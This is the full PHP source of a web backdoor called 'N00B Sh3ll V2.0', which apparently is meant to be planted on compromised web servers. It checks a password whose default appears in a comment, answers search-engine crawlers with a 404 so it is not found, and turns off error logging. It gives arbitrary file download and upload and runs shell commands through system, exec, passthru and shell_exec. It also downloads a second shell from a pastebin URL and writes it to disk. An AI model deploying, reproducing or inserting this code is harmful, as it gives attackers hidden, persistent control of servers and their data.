Backdor

1. <?php
2. /*-----------------------------------------------*/
3. #################################
4. ### ###
5. ### N00B Sh3ll V2.0 © 2018 ###
6. ### Code by XZ-Sec ###
7. ### ###
8. #################################
9. /*-----------------------------------------------*/
10. session_start();
11. error_reporting(0);
12. set_time_limit(0);
13. @set_magic_quotes_runtime(0);
14. @clearstatcache();
15. @ini_set('error_log',NULL);
16. @ini_set('log_errors',0);
17. @ini_set('max_execution_time',0);
18. @ini_set('output_buffering',0);
19. @ini_set('display_errors', 0);
20.  
21. $auth_pass = "dcb76da384ae3028d6aa9b2ebcea01c9"; // default: rahasiacok
22. $color = "#00ff00";
23. $default_action = 'FilesMan';
24. $default_use_ajax = true;
25. $default_charset = 'UTF-8';
26. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
27. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
28. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
29. header('HTTP/1.0 404 Not Found');
30. exit;}}
31. function login_shell() {
32. ?>
33. <html>
34. <head>
35. <title>Welcome :)</title>
36. <style type="text/css">
37. html {
38. margin: 20px auto;
39. background:#000000;
40. color: green;
41. text-align: center;
42. }
43. pre {
44. color: cyan;
45. }
46. header {
47. color: green;
48. margin: 10px auto;
49. }
50. input[type=password] {
51. width: 200px;
52. height: 25px;
53. color: cyan;
54. background: #000000;
55. border: 1px;
56. padding: 5px;
57. margin-left: 20px;
58. text-align: center;
59. }
60.  
61. .kedip {
62. -webkit-animation-name: blinker;
63. -webkit-animation-duration: 3s;
64. -webkit-animation-timing-function: linear;
65. -webkit-animation-iteration-count: infinite;
66.  
67. -moz-animation-name: blinker;
68. -moz-animation-duration: 2s;
69. -moz-animation-timing-function: linear;
70. -moz-animation-iteration-count: infinite;
71.  
72. animation-name: blinker;
73. animation-duration: 1s;
74. animation-timing-function: linear;
75. animation-iteration-count: infinite;
76.  
77. color: lime;
78. }
79.  
80. @-moz-keyframes blinker {
81. 0% { opacity: 1.0; }
82. 50% { opacity: 0.0; }
83. 100% { opacity: 1.0; }
84. }
85.  
86. @-webkit-keyframes blinker {
87. 0% { opacity: 1.0; }
88. 50% { opacity: 0.0; }
89. 100% { opacity: 1.0; }
90. }
91.  
92. @keyframes blinker {
93. 0% { opacity: 1.0; }
94. 50% { opacity: 0.0; }
95. 100% { opacity: 1.0; }
96. }
97. </style>
98. </head>
99. <center>
100. <header>
101. <img src='https://image.ibb.co/dYMh8T/Ruu_Ytj_E1_SACjg_Yf_VMJSYhg.png' width='350' height='350'>
102. <br>
103. <pre onkeydown="return false;" onmousedown="return false;" class="kedip">
104.  
105.  
106.  
107. __ ___
108. / / ____ ____ _____/ (_)___ ____ _
109. / / / __ \/ __ `/ __ / / __ \/ __ `/
110. / /___/ /_/ / /_/ / /_/ / / / / / /_/ / _ _ _
111. /_____/\____/\__,_/\__,_/_/_/ /_/\__, (_|_|_|_)
112. /____/
113.  
114.  
115. </pre>
116. <form method="post">
117. <input type="password" name="pass">
118. </form>
119. <?php
120. exit;
121. }
122. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
123. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
124. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
125. else
126. login_shell();
127. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
128. @ob_clean();
129. $file = $_GET['file'];
130. header('Content-Description: File Transfer');
131. header('Content-Type: application/octet-stream');
132. header('Content-Disposition: attachment; filename="'.basename($file).'"');
133. header('Expires: 0');
134. header('Cache-Control: must-revalidate');
135. header('Pragma: public');
136. header('Content-Length: ' . filesize($file));
137. readfile($file);
138. exit;
139. }
140. ?>
141. <?php
142. #############################
143. # #
144. # Coded By XZ-Sec. #
145. # N00B Sh3ll V 2.0 #
146. # #
147. #############################
148. error_reporting(0);
149. set_time_limit(0);
150. function exe($xz) {
151. if(function_exists('system')) {
152. @ob_start();
153. @system($xz);
154. $buff = @ob_get_contents();
155. @ob_end_clean();
156. return $buff;
157. } elseif(function_exists('exec')) {
158. @exec($xz,$results);
159. $buff = "";
160. foreach($results as $result) {
161. $buff .= $result;
162. } return $buff;
163. } elseif(function_exists('passthru')) {
164. @ob_start();
165. @passthru($xz);
166. $buff = @ob_get_contents();
167. @ob_end_clean();
168. return $buff;
169. } elseif(function_exists('shell_exec')) {
170. $buff = @shell_exec($xz);
171. return $buff;
172. }
173. }
174. $x = (exe('dir')) ? "ON" : "OFF";
175. $c = (function_exists('curl_version')) ? "ON" : "OFF";
176. echo '<title>N00B Sh3ll</title>
177. <link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Okupa.svg/270px-Okupa.svg.png">
178. <style>
179. a {color: black; text-decoration: none;}
180. input[type=text],[type=submit] { background: transparent; color: black; border: 1px transparent; }
181. </style><b><i>'.php_uname().'<hr><a href="?">[ Home ] | </a><a href="?xz"> [ Big Shell ] | </a>Path : ';
182. if(get_magic_quotes_gpc()){
183. foreach($_POST as $key=>$value){
184. $_POST[$key] = stripslashes($value);
185. }
186. }
187. if(isset($_GET['d'])){
188. $path = $_GET['d'];
189. }else{
190. $path = getcwd();
191. }
192. $path = str_replace('\\','/',$path);
193. $paths = explode('/',$path);
194.  
195. foreach($paths as $id=>$pat){
196. if($pat == '' && $id == 0){
197. $a = true;
198. echo '<a href="?d=/">/</a>';
199. continue;
200. }
201. if($pat == '') continue;
202. echo '<a href="?d=';
203. for($i=0;$i<=$id;$i++){
204. echo "$paths[$i]";
205. if($i != $id) echo "/";
206. }
207. echo '">'.$pat.'</a>/';
208. }
209. chdir ($path);
210. echo '<hr><form enctype="multipart/form-data" method="POST">
211. <input type="file" name="xz" />
212. <input type="submit" value="Upload" />
213. </form>
214. <form enctype="multipart/form-data" method="post">
215. Command : '.$x.' | Curl : '.$c.'<br>
216. -N00B Sh3ll- $<input type="text" name="nct">
217. <input type="submit" name="cok" value="~">
218. </form><br>';
219. if(isset($_FILES['xz'])){
220. if(copy($_FILES['xz']['tmp_name'],$path.'/'.$_FILES['xz']['name'])){
221. echo "<br>Berhasil";
222. }else{
223. echo '<br>Gagal';
224. }
225. }
226. if(isset($_REQUEST['xz'])) {
227. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
228. function xz($url, $isi) {
229. $fp = fopen($isi, "w");
230. $ch = curl_init();
231. curl_setopt($ch, CURLOPT_URL, $url);
232. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
233. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
234. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
235. curl_setopt($ch, CURLOPT_FILE, $fp);
236. return curl_exec($ch);
237. curl_close($ch);
238. fclose($fp);
239. ob_flush();
240. flush();
241. }
242. if(file_exists('privcok.php')) {
243. echo "<a href='$full/privcok.php' target='_blank'>-> Done !!! <-</a>";
244. } else {
245. if(xz("https://pastebin.com/raw/gDB35W6u","privcok.php")) {
246. echo "<a href='$full/privcok.php' target='_blank'>-> Done !!! <-</a>";
247. } else {
248. echo "Gagal Ambil Shell";
249. }
250. }
251. }
252. if(!isset($_POST['cok'])) die;
253. $xz = $_POST['nct'];
254. $crst = "<pre>".exe("".$xz)."</pre>";
255. echo $crst;
256. ?>